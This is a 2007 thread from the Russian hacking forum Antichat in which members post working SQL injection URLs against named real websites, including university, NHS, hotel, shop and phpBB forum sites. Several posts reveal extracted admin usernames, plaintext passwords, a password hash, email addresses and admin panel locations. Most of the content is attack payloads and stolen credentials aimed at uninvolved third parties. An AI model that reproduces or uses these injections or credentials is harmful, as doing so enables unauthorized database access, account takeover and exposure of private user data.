ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1661  
Старый 05.04.2007, 22:15
Аватар для Fr-Ron
Fr-Ron
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589

Репутация: 337
По умолчанию

1) Не осилил =(

Цитата:
http://www.rpgserv.ru/gu.php?id=13'
2) Осилил, гуд. Пароли без шифровки, присутствуют мейлы!!!

Цитата:
http://cybertown.ru/catalog.php?action=site&id=-89483+union+select+1,2,concat(nick,char(58),pwd,ch ar(58),mail),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19+from+forum_users+limit+1,1/*
admin:HellBoy:help@cybertown.ru
 
Ответить с цитированием

  #1662  
Старый 05.04.2007, 22:30
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Код:
http://www.grinderclinic.ru/index.php?section=-1+union+select+convert(version()+using+cp1251)/*
ничего интересного не нашел..
Код:
http://www.rustrana.ru/new.php?nid=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14/*&new=1
аналогично.. лень перебирать таблицы потыркал наугад и забил)
 
Ответить с цитированием

  #1663  
Старый 05.04.2007, 22:38
Аватар для zl0ba
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

Код:
http://www.linkdump.be/index.php?y=-2003+union+select+1,2,user,4,5,6,7,8+from+users/*&m=9
колонку с пасами не нашёл =(
 
Ответить с цитированием

  #1664  
Старый 05.04.2007, 23:16
Аватар для zl0ba
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

http://www.facilities.upenn.edu


University of Pennsylvania

Код:
http://www.facilities.upenn.edu/mapsBldgs/view_map.php3?id=-407+union+select+1,2,3,4,concat(version(),0x3a,user(),0x3a,database()),6,7,8,9,10,11/*
 
Ответить с цитированием

  #1665  
Старый 05.04.2007, 23:46
Аватар для valiko
valiko
Участник форума
Регистрация: 28.01.2007
Сообщений: 153
Провел на форуме:
1237085

Репутация: 452
По умолчанию

Цитата:
Сообщение от zl0ba  
колонку с пасами не нашёл =(
есть подозрение, что пароль в третьем столбце
Код:
http://www.linkdump.be/index.php?y=-2003+union+select+u.*+from+users+u/*&m=9
а сопоставить с логином - по id или email
Код:
http://www.linkdump.be/index.php?y=-2003+union+select+1,2,id,user,email,6,7,8+from+users/*&m=9

Последний раз редактировалось valiko; 06.04.2007 в 01:16..
 
Ответить с цитированием

  #1666  
Старый 06.04.2007, 01:56
Аватар для XTErner
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

shop
Код:
http://www.velocity.la/viewnewsarticle.php?id=-8+union+select+1,2,username,password,5,6,7+from+admin/*
http://www.velocity.la/admin
user:admin
pass:admin
Код:
http://www.skirtsinadvertising.com/interview.php?id=-1+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
 
Ответить с цитированием

  #1667  
Старый 06.04.2007, 02:20
Аватар для Thanat0z
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

Код:
http://www.ukmotoringdirectory.co.uk/motoring.php?id=2025+UNION+SELECT+null,null,convert(VERSION()+using+latin1),null,null,null,convert(password+using+latin1),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+admin/*
админка: http://www.ukmotoringdirectory.co.uk/admin

http://www.chathamhouse.org.uk/index.php?id=5&cid=110 
19 колонок, 3 версия

http://www.southcentral.nhs.uk/page.php?id=182%20group%20by%209/*
срабатывает редирект :(
версия 4.0.26 
база nhssc_db
спасибо -={x_Lex}=- за помощь
 
Ответить с цитированием

  #1668  
Старый 06.04.2007, 06:09
Аватар для VampiRUS
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию

Цитата:
http://softomsk.ru/soft.php?id=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(conca t(name,0x3a,password),0x71),0x71),5,6,7,8,9,0,1,2+ from+site_members/*
Admin:5bb3d1e738e0bfeafe71bcfea2f002a8=alexsoft
http://softomsk.ru/admin/
Цитата:
http://sex-dating.ro/user.php?id=-1+union+select+1,concat_ws(0x3a,nickname,parola,em ail),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+from+users/*
еле допёр какие там поля в таблице.
 
Ответить с цитированием

  #1669  
Старый 06.04.2007, 12:45
Аватар для random
random
Познающий
Регистрация: 05.09.2006
Сообщений: 50
Провел на форуме:
1988972

Репутация: 250
По умолчанию

Код:
http://www.hotelcammerpoorte.be/index.php?page=-1+union+select+1,2,3,4,concat(username,0x3a,password),6+from+users/*&lang=EN
user: Admin
password: 1000
http://www.hotelcammerpoorte.be/admin.php
 
Ответить с цитированием

  #1670  
Старый 06.04.2007, 15:34
Аватар для kamaz
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Цитата:
http://www.falklands-malvinas.com/forum/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),use rname,char(58),user_email,char(58),user_icq,char(5 8),user_password),3,4,5,6%20from%20phpbb_users%20l imit%201,2/*
Цитата:
http://forum.rleeermey.net/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),use rname,char(58),user_email,char(58),user_icq,char(5 8),user_password),3,4,5,6%20from%20phpbb_users%20l imit%201,2/*
Цитата:
http://www.reyvarela.net/forums/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),use rname,char(58),user_email,char(58),user_icq,char(5 8),user_password),3,4,5,6%20from%20phpbb_users%20l imit%201,2/*
Цитата:
http://www.darkarmada.nl/CMS/forums/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),use rname,char(58),user_email,char(58),user_icq,char(5 8),user_password),3,4,5,6%20from%20phpbb_users%20l imit%201,2/*
Вывод в title
____
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ